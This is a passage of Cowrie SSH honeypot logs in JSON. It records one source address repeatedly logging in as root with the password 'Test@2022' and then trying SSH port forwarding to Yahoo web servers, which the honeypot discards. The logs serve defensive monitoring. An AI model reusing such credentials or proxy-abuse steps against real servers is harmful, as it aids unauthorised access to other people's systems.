h-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:26.870803Z","src_ip":"213.209.150.239","session":"bff6eb34c8f3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.153543Z","src_ip":"213.209.150.239","session":"bff6eb34c8f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":4122,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:4122","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.211106Z","session":"bff6eb34c8f3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.267971Z","src_ip":"213.209.150.239","session":"bff6eb34c8f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":10189,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10189","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.423119Z","session":"bff6eb34c8f3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.479917Z","src_ip":"213.209.150.239","session":"bff6eb34c8f3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.537494Z","src_ip":"213.209.150.239","session":"bff6eb34c8f3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47577,"dst_ip":"1.2.3.4","dst_port":22,"session":"1657bb389b13","protocol":"ssh","message":"New connection: 213.209.150.239:47577 (1.2.3.4:22) [session: 1657bb389b13]","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.583894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.585019Z","src_ip":"213.209.150.239","session":"1657bb389b13"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.632605Z","src_ip":"213.209.150.239","session":"1657bb389b13"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.868212Z","src_ip":"213.209.150.239","session":"1657bb389b13"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27948,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27948","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.916276Z","session":"1657bb389b13"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:27.963626Z","src_ip":"213.209.150.239","session":"1657bb389b13"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":25238,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:25238","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.101882Z","session":"1657bb389b13"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.149442Z","src_ip":"213.209.150.239","session":"1657bb389b13"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.197975Z","src_ip":"213.209.150.239","session":"1657bb389b13"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47640,"dst_ip":"1.2.3.4","dst_port":22,"session":"48de5bb11c79","protocol":"ssh","message":"New connection: 213.209.150.239:47640 (1.2.3.4:22) [session: 48de5bb11c79]","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.244016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.244832Z","src_ip":"213.209.150.239","session":"48de5bb11c79"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.291879Z","src_ip":"213.209.150.239","session":"48de5bb11c79"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.527388Z","src_ip":"213.209.150.239","session":"48de5bb11c79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":27048,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27048","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.575904Z","session":"48de5bb11c79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.623179Z","src_ip":"213.209.150.239","session":"48de5bb11c79"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16037,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16037","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.761611Z","session":"48de5bb11c79"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.808907Z","src_ip":"213.209.150.239","session":"48de5bb11c79"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.857071Z","src_ip":"213.209.150.239","session":"48de5bb11c79"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47703,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b893d193cd9","protocol":"ssh","message":"New connection: 213.209.150.239:47703 (1.2.3.4:22) [session: 4b893d193cd9]","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.912598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.913491Z","src_ip":"213.209.150.239","session":"4b893d193cd9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:28.969874Z","src_ip":"213.209.150.239","session":"4b893d193cd9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.253036Z","src_ip":"213.209.150.239","session":"4b893d193cd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":23662,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23662","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.310164Z","session":"4b893d193cd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.367223Z","src_ip":"213.209.150.239","session":"4b893d193cd9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":29944,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:29944","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.522897Z","session":"4b893d193cd9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.579391Z","src_ip":"213.209.150.239","session":"4b893d193cd9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.636510Z","src_ip":"213.209.150.239","session":"4b893d193cd9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e88adefd45c1","protocol":"ssh","message":"New connection: 213.209.150.239:47782 (1.2.3.4:22) [session: e88adefd45c1]","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.692306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.692989Z","src_ip":"213.209.150.239","session":"e88adefd45c1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:29.749791Z","src_ip":"213.209.150.239","session":"e88adefd45c1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.032547Z","src_ip":"213.209.150.239","session":"e88adefd45c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":19098,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:19098","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.090100Z","session":"e88adefd45c1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.146883Z","src_ip":"213.209.150.239","session":"e88adefd45c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22702,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22702","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.303065Z","session":"e88adefd45c1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.360443Z","src_ip":"213.209.150.239","session":"e88adefd45c1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.418155Z","src_ip":"213.209.150.239","session":"e88adefd45c1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47857,"dst_ip":"1.2.3.4","dst_port":22,"session":"b023eb96200b","protocol":"ssh","message":"New connection: 213.209.150.239:47857 (1.2.3.4:22) [session: b023eb96200b]","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.464017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.464918Z","src_ip":"213.209.150.239","session":"b023eb96200b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.511719Z","src_ip":"213.209.150.239","session":"b023eb96200b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.746597Z","src_ip":"213.209.150.239","session":"b023eb96200b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":28249,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:28249","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.794475Z","session":"b023eb96200b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.842212Z","src_ip":"213.209.150.239","session":"b023eb96200b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":13431,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13431","sensor":"my-vps","timestamp":"2025-08-26T01:07:30.977521Z","session":"b023eb96200b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.024709Z","src_ip":"213.209.150.239","session":"b023eb96200b"}
